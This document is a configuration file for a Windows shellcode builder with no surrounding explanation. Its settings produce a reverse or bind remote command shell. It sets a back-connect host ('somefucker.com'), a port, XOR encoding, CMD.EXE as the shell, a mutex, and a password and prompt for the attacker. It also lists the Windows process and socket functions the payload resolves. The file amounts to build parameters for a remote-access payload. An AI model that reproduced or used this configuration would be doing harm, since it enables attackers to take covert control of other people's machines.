SHELL_PORT=0x029A
VAR_PORT=1
MAXBUFSIZE=512
USE_SEH=1
USE_SEH_TH=0
USE_MUTEX=1
DO_REUSEADDR=1
SUPPORT_WIN9X=1
USE_OLDWAY_2FIND_K32=1
XORBYTE=0xCC
USE_LASTCALL=1
USE_XPUSH_STRINGS=1
ALLOC_BUF=1
BACKCONNECT=1
IP_ADDR=0x00000000
RECONNECT_MS=0x00003039
MULTITHREAD=1
WS2_ID=0x000000B9
K32_ID=0x000000B8
DONT_DROP=1
DO_WSA_STARTUP=1
DIRECT_API=0
API_K32_GlobalAlloc=0x00000000
API_K32_GlobalFree=0x00000000
API_K32_CreateThread=0x00000000
API_K32_CloseHandle=0x00000000
API_K32_CreatePipe=0x00000000
API_K32_CreateProcessA=0x00000000
API_K32_GetExitCodeProcess=0x00000000
API_K32_PeekNamedPipe=0x00000000
API_K32_ReadFile=0x00000000
API_K32_WriteFile=0x00000000
API_K32_TerminateProcess=0x00000000
API_K32_ExitThread=0x00000000
API_K32_CreateMutexA=0x00000000
API_K32_GetLastError=0x00000000
API_K32_Sleep=0x00000000
API_K32_LoadLibraryA=0x00000000
API_K32_GetVersion=0x00000000
API_K32_WaitForSingleObject=0x00000000
API_K32_GetTickCount=0x00000000
API_WS2_WSAStartup=0x00000000
API_WS2_socket=0x00000000
API_WS2_setsockopt=0x00000000
API_WS2_closesocket=0x00000000
API_WS2_connect=0x00000000
API_WS2_gethostbyname=0x00000000
API_WS2_select=0x00000000
API_WS2_bind=0x00000000
API_WS2_listen=0x00000000
API_WS2_accept=0x00000000
API_WS2_send=0x00000000
API_WS2_recv=0x00000000
POS_INSTR=16
POS_ARG1=24
POS_COMM=40
POS_HPP_COMMENT=50
POS_HPP_COMMENT_SIZE=70
HPP_TYPE=1
SH_SIZE=1
COMPRESSED=0
BEST=0
BEST2=0
XORED=0
HIDE=/\\
P1=2
P2=8
P3=0
P4=3
P5=0
HPP_OFF=1
CMT_SRC=1
CMT_HPP=1
SUB_CREATEPIPE=1
SUB_KILLSHELL=1
SUB_INIT=0
SUB_FINDBASE=1
INACT=600
MACRO_CALL=1
str_mutex=sh_mtx
str_ws2=WS2_32.DLL
str_cmd=CMD.EXE
str_command=COMMAND.COM
SYNTAX=0
l_prefix=__
l_postfix=
x_prefix=var_
x_postfix=
c_prefix=C_
c_postfix=
m_prefix=M_
m_postfix=
a_prefix=API_
a_postfix=
HASHTYPE=2
BC2HOST=1
str_host=somefucker.com
NOSHELL=0
PROMPT=1
AUTH=1
SNIPPET=1
str_prompt=yo bro?\r\n
str_auth=wazzup!
str_snippet=#cdsnpt#
